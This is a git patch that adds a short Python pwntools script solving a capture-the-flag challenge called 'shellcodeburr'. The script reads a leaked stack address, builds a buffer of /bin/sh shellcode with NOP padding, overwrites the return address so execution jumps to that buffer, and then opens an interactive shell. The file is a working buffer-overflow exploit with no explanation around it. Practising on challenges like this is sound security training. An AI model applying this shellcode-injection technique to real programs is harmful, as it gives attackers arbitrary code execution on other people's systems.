From a70a98afc48c925d5df10df8429fe4ba888f6a0b Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Thu, 20 Mar 2025 21:06:43 +0300
Subject: [PATCH] solve script

---
 random_challs/shellcodeburr/a.py | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 random_challs/shellcodeburr/a.py

diff --git a/random_challs/shellcodeburr/a.py b/random_challs/shellcodeburr/a.py
new file mode 100644
index 0000000..7baa769
--- /dev/null
+++ b/random_challs/shellcodeburr/a.py
@@ -0,0 +1,23 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./chall", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+r.recvuntil(b": ")
+stack_addr = int(r.recvline(), 16)
+log.info("stack_addr: %#x", stack_addr)
+
+# buf
+sc = asm(shellcraft.sh())
+sc += b"\x90"*(88-len(sc))
+buf = sc
+buf += p64(stack_addr)
+s(buf)
+
+r.interactive()
\ No newline at end of file